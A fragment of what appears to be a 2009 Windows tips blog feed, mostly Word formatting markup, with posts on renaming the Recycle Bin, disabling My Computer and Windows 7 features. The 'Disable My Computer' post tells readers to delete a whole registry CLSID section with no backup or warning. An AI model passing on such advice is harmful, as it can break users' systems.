rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:Verdana; 	panose-1:2 11 6 4 3 5 4 4 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:536871559 0 0 0 415 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:WordDocument&gt;   &lt;w:View&gt;Normal&lt;/w:View&gt;   &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:PunctuationKerning/&gt;   &lt;w:ValidateAgainstSchemas/&gt;   &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:Compatibility&gt;    &lt;w:BreakWrappedTables/&gt;    &lt;w:SnapToGridInCell/&gt;    &lt;w:WrapTextWithPunct/&gt;    &lt;w:UseAsianBreakRules/&gt;    &lt;w:DontGrowAutofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:LatentStyles DefLockedState="false" LatentStyleCount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p style="text-align: center;" align="center"&gt;&lt;span style="font-size: 14pt; font-family: Arial;"&gt;To change the name of the Recycle Bin desktop icon, open Regedit and go to:&lt;br /&gt;&lt;br /&gt;HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E} &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: center;" align="center"&gt;&lt;span style="font-size: 14pt; font-family: Arial;"&gt;and change the name "Recycle Bin" to whatever you want (don't type any quotes).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-6814642186504829733?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/6814642186504829733/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/rename-recycle-bin.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/6814642186504829733'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/6814642186504829733'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/rename-recycle-bin.html' title='RENAME RECYCLE BIN'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_T53992hHLOM/SfA4fTmLhuI/AAAAAAAAAIw/VNrgncwoA4Y/s72-c/dustbin.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-4810566821812569972</id><published>2009-04-24T03:13:00.000-07:00</published><updated>2009-04-23T03:32:53.297-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>Disable My Computer</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_T53992hHLOM/SfBBQQX6YkI/AAAAAAAAAJI/Bx1al_c_Q6Y/s1600-h/My-computer-256x256.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 256px; height: 256px;" src="http://2.bp.blogspot.com/_T53992hHLOM/SfBBQQX6YkI/AAAAAAAAAJI/Bx1al_c_Q6Y/s400/My-computer-256x256.png" alt="" id="BLOGGER_PHOTO_ID_5327830106708271682" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;&lt;span style="font-size: 12pt; font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;1. Start Regedit&lt;br /&gt;&lt;br /&gt;2. Search for 20D04FE0-3AEA-1069-A2D8-08002B30309D&lt;br /&gt;&lt;br /&gt;3. This should bring you to the HKey_Classes_Root \ CLSID section&lt;br /&gt;&lt;br /&gt;4. Delete the entire section.&lt;br /&gt;&lt;br /&gt;5. Now when you click on My Computer, nothing will happen&lt;/span&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-4810566821812569972?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/4810566821812569972/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/disable-my-computer.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/4810566821812569972'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/4810566821812569972'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/disable-my-computer.html' title='Disable My Computer'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_T53992hHLOM/SfBBQQX6YkI/AAAAAAAAAJI/Bx1al_c_Q6Y/s72-c/My-computer-256x256.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-3613871870430148466</id><published>2009-04-22T12:12:00.000-07:00</published><updated>2009-05-08T12:21:34.359-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>WINDOWS 7</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/SeYx73OBV_I/AAAAAAAAAHE/y_AuB5Mzt9o/s1600-h/windows-vienna.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 384px; height: 288px;" src="http://1.bp.blogspot.com/_T53992hHLOM/SeYx73OBV_I/AAAAAAAAAHE/y_AuB5Mzt9o/s400/windows-vienna.PNG" alt="" id="BLOGGER_PHOTO_ID_5324998513916991474" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p  style="font-family:arial;"&gt;&lt;span style="font-size:130%;"&gt;&lt;b&gt;Windows 7&lt;/b&gt; (formerly codenamed &lt;b&gt;Blackcomb&lt;/b&gt; and &lt;b&gt;Vienna&lt;/b&gt;) will be the next version of Microsoft Windows, an operating system produced by Microsoft Corporation for use on personal computers, including home and business desktops, laptops, tablet PCs, notebooks and media center PCs. Representatives of Microsoft estimated in 2007 that Windows 7 would have a three-year development time frame following the release of its predecessor Windows Vista, but that the release date would ultimately be determined by product quality.&lt;/span&gt;&lt;/p&gt;&lt;p  style="font-family:arial;"&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;/p&gt;&lt;p face="arial"&gt;&lt;span style="font-size:130%;"&gt;&lt;sup&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/sup&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="font-family: arial;"&gt;&lt;span style="font-size:130%;"&gt;Windows Vista flopped very badly some regarding it as the 'worlds most unstable OS'.Thus  a lot is at stake for Microsoft in its new release 'se7en'.Windows 7 does away with most of Vista drawbacks .It can be called the repaired,patched up and compacted form of Vista with not only looks but also substance it has a lot of new features &lt;/span&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;&lt;span style="font-size:130%;"&gt;, such as advances in touch, speech, and handwriting recognition, support for virtual hard disks, improved performance on multi-core processors, improved boot performance, and kernel improvements.&lt;/span&gt;&lt;/p&gt;&lt;p style="font-family: arial;"&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;/p&gt;&lt;p class="MsoNormal" style="color: rgb(204, 255, 255);"&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;A new feature is called &lt;b&gt;Library&lt;/b&gt;. Its not a folder or file but is a way to group related files and folders. If you have documents and text files in several locations like different folders on the hard drive, removable flash drive, network folder, etc. You can use a library to see all the files in those locations collectively in one Library. The files will remain in their &lt;span style=""&gt; &lt;/span&gt;respective location; the library contains an index to the file or folder.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="color: rgb(204, 255, 255);"&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;&lt;br /&gt;&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;&lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="color: rgb(204, 255, 255);"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;The User Account Control (UAC&lt;/span&gt;&lt;/b&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;) defaults to a moderate level so it does not constantly pop up asking about everything....I know that means decreased security but its up to you whether you want your screen space to be filled up by warning messages.&lt;/span&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="color: rgb(204, 255, 255);"&gt;&lt;/p&gt;&lt;p style="font-family: arial; color: rgb(204, 255, 255);"&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   